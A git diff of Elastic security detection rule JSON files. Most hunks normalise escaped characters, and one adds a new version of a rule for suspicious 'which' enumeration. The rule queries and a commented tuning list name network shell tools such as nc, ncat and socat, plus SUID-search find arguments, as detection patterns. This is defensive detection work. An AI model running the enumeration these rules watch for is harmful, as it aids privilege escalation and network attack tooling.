a/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_105.json b/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_105.json index 39bb1b8278b..fcf78558e21 100644 --- a/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_105.json +++ b/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_105.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_106.json b/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_106.json index 90d027e9790..26471303962 100644 --- a/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_106.json +++ b/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_106.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_107.json b/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_107.json index 1a2d2719fc2..da2a74f3ea0 100644 --- a/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_107.json +++ b/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_107.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_103.json b/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_103.json index 1fab64dc7f2..061af244e71 100644 --- a/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_103.json +++ b/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_103.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_104.json b/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_104.json index 3369bc3705a..e7d584f7616 100644 --- a/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_104.json +++ b/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_104.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_105.json b/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_105.json index 8a162ef9404..de468943556 100644 --- a/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_105.json +++ b/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_105.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_106.json b/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_106.json index aaa836cbc40..90c456e8853 100644 --- a/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_106.json +++ b/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_106.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_107.json b/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_107.json index f6b989454fd..eecc05b54c2 100644 --- a/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_107.json +++ b/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_107.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_1.json b/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_1.json index 5e3be062e3a..3ba1b0fefc3 100644 --- a/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_1.json +++ b/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_1.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -104,7 +104,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_2.json b/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_2.json index 2d426c769db..d73c785f95e 100644 --- a/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_2.json +++ b/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_2.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -105,7 +105,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_3.json b/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_3.json index 591bc5b0412..cf54fb84e3d 100644 --- a/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_3.json +++ b/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_3.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "SUID/SGUID Enumeration Detected", - "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \nprocess.name == \"find\" and process.args : \"-perm\" and process.args : (\n \"/6000\", \"-6000\", \"/4000\", \"-4000\", \"/2000\", \"-2000\", \"/u=s\", \"-u=s\", \"/g=s\", \"-g=s\", \"/u=s,g=s\", \"/g=s,u=s\"\n) and not (\n user.Ext.real.id == \"0\" or group.Ext.real.id == \"0\" or process.args_count \u003e= 12 or \n (process.args : \"/usr/bin/pkexec\" and process.args : \"-xdev\" and process.args_count == 7)\n)\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \nprocess.name == \"find\" and process.args : \"-perm\" and process.args : (\n \"/6000\", \"-6000\", \"/4000\", \"-4000\", \"/2000\", \"-2000\", \"/u=s\", \"-u=s\", \"/g=s\", \"-g=s\", \"/u=s,g=s\", \"/g=s,u=s\"\n) and not (\n user.Ext.real.id == \"0\" or group.Ext.real.id == \"0\" or process.args_count >= 12 or \n (process.args : \"/usr/bin/pkexec\" and process.args : \"-xdev\" and process.args_count == 7)\n)\n", "related_integrations": [ { "package": "endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -111,7 +111,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_4.json b/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_4.json index 9979cdb8146..eea1d846974 100644 --- a/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_4.json +++ b/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_4.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "SUID/SGUID Enumeration Detected", - "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \nprocess.name == \"find\" and process.args : \"-perm\" and process.args : (\n \"/6000\", \"-6000\", \"/4000\", \"-4000\", \"/2000\", \"-2000\", \"/u=s\", \"-u=s\", \"/g=s\", \"-g=s\", \"/u=s,g=s\", \"/g=s,u=s\"\n) and not (\n user.Ext.real.id == \"0\" or group.Ext.real.id == \"0\" or process.args_count \u003e= 12 or \n (process.args : \"/usr/bin/pkexec\" and process.args : \"-xdev\" and process.args_count == 7)\n)\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \nprocess.name == \"find\" and process.args : \"-perm\" and process.args : (\n \"/6000\", \"-6000\", \"/4000\", \"-4000\", \"/2000\", \"-2000\", \"/u=s\", \"-u=s\", \"/g=s\", \"-g=s\", \"/u=s,g=s\", \"/g=s,u=s\"\n) and not (\n user.Ext.real.id == \"0\" or group.Ext.real.id == \"0\" or process.args_count >= 12 or \n (process.args : \"/usr/bin/pkexec\" and process.args : \"-xdev\" and process.args_count == 7)\n)\n", "related_integrations": [ { "package": "endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -111,7 +111,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_1.json b/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_1.json index 39418412b3a..8aa76fd6c16 100644 --- a/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_1.json +++ b/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_1.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious which Enumeration", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"which\" and process.args_count \u003e= 10\n\n/* potential tuning if rule would turn out to be noisy\nand process.args in (\"nmap\", \"nc\", \"ncat\", \"netcat\", nc.traditional\", \"gcc\", \"g++\", \"socat\") and \nprocess.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n*/ \n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"which\" and process.args_count >= 10\n\n/* potential tuning if rule would turn out to be noisy\nand process.args in (\"nmap\", \"nc\", \"ncat\", \"netcat\", nc.traditional\", \"gcc\", \"g++\", \"socat\") and \nprocess.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n*/ \n", "related_integrations": [ { "package": "endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_2.json b/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_2.json index fe4bde7c974..00e9e471d0a 100644 --- a/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_2.json +++ b/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_2.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious which Enumeration", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"which\" and process.args_count \u003e= 10\n\n/* potential tuning if rule would turn out to be noisy\nand process.args in (\"nmap\", \"nc\", \"ncat\", \"netcat\", nc.traditional\", \"gcc\", \"g++\", \"socat\") and \nprocess.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n*/ \n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"which\" and process.args_count >= 10\n\n/* potential tuning if rule would turn out to be noisy\nand process.args in (\"nmap\", \"nc\", \"ncat\", \"netcat\", nc.traditional\", \"gcc\", \"g++\", \"socat\") and \nprocess.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n*/ \n", "related_integrations": [ { "package": "endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_3.json b/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_3.json new file mode 100644 index 00000000000..a96c68a1d92 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_3.json @@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "This rule monitors for the usage of the which command with an unusual amount of process arguments. Attackers may leverage the which command to enumerate the system for useful installed utilities that may be used after compromising a system to escalate privileges or move latteraly across the network.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious which Enumeration", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"which\" and process.args_count >= 10 and not process.parent.name == \"jem\"\n\n/* potential tuning if rule would turn out to be noisy\nand process.args in (\"nmap\", \"nc\", \"ncat\", \"netcat\", nc.traditional\", \"gcc\", \"g++\", \"socat\") and \nprocess.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n*/ \n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "5b18eef4-842c-4b47-970f-f08d24004bde", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "5b18eef4-842c-4b47-970f-f08d24004bde_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5b9eb30f-87d6-45f4-9289-2bf2024f0376_1.json b/packages/security_detection_engine/kibana/security_rule/5b9eb30f-87d6-45f4-9289-2bf2024f0376_1.json index a5e1dd5e661..fce9d0fb6c8 100644 --- a/packages/security_detection_engine/kibana/security_rule/5b9eb30f-87d6-45f4-9289-2bf2024f0376_1.json +++ b/packages/security_detection_engine/kibana/security_rule/5b9eb30f-87d6-45f4-9289-2bf2024f0376_1.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5b9eb30f-87d6-45f4-9289-2bf2024f0376_2.json b/packages/security_detection_engine/kibana/security_rule/5b9eb30f-87d6-45f4-9289-2bf2024f0376_2.json index e7421ddfcc6..1eaf4fcb958 100644 --- a/packages/security_detection_engine/kibana/security_rule/5b9eb30f-87d6-45f4-9289-2bf2024f0376_2.json +++ b/packages/security_detection_engine/kibana/security_rule/5b9eb30f-87d6-45f4-9289-2bf2024f0376_2.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -97,7 +97,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_102.json b/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_102.json index bcb7415227c..7cebb8055cb 100644 --- a/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_102.json +++ b/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_102.json @@ -59,7 +59,7 @@ ], "risk_score": 73, "rule_id": "5bb4a95d-5a08-48eb-80db-4c3a63ec78a8", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_103.json b/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_103.json index 0f9a14b6c47..85363def0b3 100644 --- a/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_103.json +++ b/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_103.json @@ -59,7 +59,7 @@ ], "risk_score": 73, "rule_id": "5bb4a95d-5a08-48eb-80db-4c3a63ec78a8", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_104.json b/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_104.json index f16c70f32d9..e16560b726d 100644 --- a/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_104.json +++ b/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_104.json @@ -59,7 +59,7 @@ ], "risk_score": 73, "rule_id": "5bb4a95d-5a08-48eb-80db-4c3a63ec78a8", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_105.json b/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_105.json index 5d49b4370ba..6aca59680a2 100644 --- a/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_105.json +++ b/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_105.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "5bb4a95d-5a08-48eb-80db-4c3a63ec78a8", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_102.json b/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_102.json index 00bda565a46..2bfff3e7b35 100644 --- a/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_102.json +++ b/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_103.json b/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_103.json index 2b29e680192..eb829a25fcd 100644 --- a/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_103.json +++ b/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_103.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_104.json b/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_104.json index 891771633a6..c7429adbbef 100644 --- a/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_104.json +++ b/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_104.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_205.json b/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_205.json index 72e57a9c6a7..87640fb5477 100644 --- a/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_205.json +++ b/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_205.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_2.json b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_2.json index a4107a042d0..d167504ff42 100644 --- a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_2.json +++ b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_2.json @@ -62,7 +62,7 @@ ], "risk_score": 73, "rule_id": "5c6f4c58-b381-452a-8976-f1b1c6aa0def", - "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_3.json b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_3.json index 670b6904257..448a75f6749 100644 --- a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_3.json +++ b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_3.json @@ -57,7 +57,7 @@ ], "risk_score": 73, "rule_id": "5c6f4c58-b381-452a-8976-f1b1c6aa0def", - "setup": "The 'Audit Directory Service Changes' logging policy must 